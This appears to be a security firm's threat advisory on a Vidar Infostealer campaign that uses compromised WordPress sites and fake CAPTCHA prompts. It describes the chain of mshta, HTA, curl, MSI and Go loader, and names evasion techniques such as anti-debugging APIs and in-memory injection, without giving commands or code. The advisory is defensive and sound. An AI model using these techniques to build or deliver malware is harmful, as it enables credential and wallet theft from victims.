A recent campaign distributing the Vidar Infostealer through compromised WordPress websites demonstrates a growing shift from vulnerability exploitation toward social engineering-driven attacks. Victims are presented with deceptive fake CAPTCHA prompts that instruct them to execute malicious commands manually, enabling attackers to bypass traditional browser-based protections and security controls.
The multi-stage infection chain abuses legitimate Windows utilities such as mshta.exe, curl.exe, and msiexec.exe to covertly deliver malware that executes primarily in memory. Once deployed, the Vidar Infostealer harvests credentials, browser cookies, session tokens, autofill data, and cryptocurrency wallet information while minimizing forensic visibility. This campaign highlights the increasing enterprise risk posed by trusted websites being weaponized as malware delivery infrastructure and reinforces the need for stronger endpoint controls, user awareness, and behavioural threat detection.
The attack chain begins with compromised WordPress websites injecting malicious iframe content that redirects users to fake CAPTCHA verification pages designed to imitate legitimate verification workflows. Victims are socially engineered into executing a malicious MSHTA command, which retrieves a remote HTA payload hosted on attacker-controlled infrastructure.
The downloaded HTA script performs environment validation, applies XOR-based string obfuscation, checks installed security products using WMI queries, and creates hidden working directories within AppData locations. It then downloads a malicious MSI installer using curl.exe and silently executes it through msiexec.exe.
The MSI launches a Go-based malware loader responsible for conducting anti-analysis operations, including debugger detection and timing validation checks. The loader decrypts and injects the Vidar Infostealer payload directly into memory, enabling fileless execution while reducing on-disk artifacts and bypassing conventional endpoint defences.
Once active, Vidar extracts browser credentials, session cookies, saved autofill information, cryptocurrency wallet data, and other sensitive information before communicating with attacker-controlled command-and-control infrastructure for data exfiltration. The full attack chain is detailed below,
Delivery and Infection Chain:
The campaign relies heavily on compromised legitimate websites and social engineering rather than traditional exploit-based delivery methods.
Technical Capabilities:
The campaign demonstrates advanced evasion and stealth techniques through extensive abuse of Living-off-the-Land Binaries (LOLBins), including mshta.exe, curl.exe, and msiexec.exe, allowing malicious activity to blend into legitimate Windows operations.
The HTA payload employs XOR-based obfuscation, WMI-based security product enumeration, and removal of forensic indicators such as Zone Identifier metadata. Hidden directories are created within AppData paths to conceal operational artifacts and staging components.
The Go-based loader incorporates anti-analysis and sandbox evasion techniques, including debugger detection through APIs such as CheckRemoteDebuggerPresent and IsDebuggerPresent, along with timing-based validation mechanisms using QueryPerformanceCounter and GetTickCount.
The Vidar payload executes entirely in memory, significantly reducing forensic visibility while enabling theft of browser credentials, session tokens, autofill data, and cryptocurrency wallet information. Stolen data is exfiltrated through encrypted communication channels to the remote attacker infrastructure.
Attribution and Evolution:
While no specific threat actor has been conclusively attributed to this campaign, the observed techniques align closely with financially motivated cybercriminal groups known for distributing infostealers and credential theft malware.
The campaign reflects the continued evolution of ClickFix-style social engineering attacks, where fake CAPTCHA workflows replace traditional exploit kits as the primary infection mechanism. Since 2024, these campaigns have increasingly incorporated modular loaders, stronger obfuscation techniques, and compromised legitimate websites to improve reliability and evade detection.
Active Campaign and Geographic Spread:
The campaign has been observed impacting users across Italy, France, the United States, the United Kingdom, and Brazil through compromised WordPress websites hosting malicious iframe content. The activity reflects the continued evolution of ClickFix-style social engineering campaigns, where fake CAPTCHA verification pages increasingly replace traditional exploit kits as the primary malware delivery mechanism.
Since 2024, threat actors behind similar infostealer operations have incorporated stronger obfuscation methods, modular Go-based loaders, and more reliable payload delivery using compromised legitimate websites rather than attacker-owned infrastructure. This significantly increases campaign scalability and reduces the likelihood of immediate detection or blocking.
Although the currently observed activity spans multiple international regions, the delivery techniques are globally applicable and pose risk to organizations across all sectors, including enterprises throughout the UAE and GCC region that rely heavily on browser-based SaaS platforms and cloud applications.
Conclusion:
This campaign demonstrates the growing effectiveness of user-driven compromise techniques where attackers manipulate trusted websites and legitimate system utilities rather than relying solely on software vulnerabilities. The combination of fake CAPTCHA social engineering, LOLBin abuse, and in-memory malware execution creates a highly evasive attack chain capable of bypassing traditional security controls.
Organizations should strengthen behavioral monitoring, restrict unnecessary command execution, improve detection of suspicious process chains, and prioritize user awareness training to reduce the risk of compromise from increasingly sophisticated infostealer campaigns.
Successful infection with the Vidar Infostealer can result in theft of enterprise credentials, browser session tokens, saved passwords, cryptocurrency wallet information, and sensitive autofill data. Stolen session tokens may allow attackers to bypass multi-factor authentication protections and maintain unauthorized access to enterprise services.
Compromised systems may also serve as entry points for lateral movement, additional malware deployment, ransomware activity, or broader account compromise. For organizations in the UAE and GCC, credential theft impacting regulated environments may trigger compliance and reporting obligations under frameworks such as UAE PDPL and NCA ECC.
Given the widespread use of Microsoft 365, browser-based SaaS applications, and cloud platforms across enterprise environments, this campaign presents substantial operational, financial, and reputational risk across industries globally.
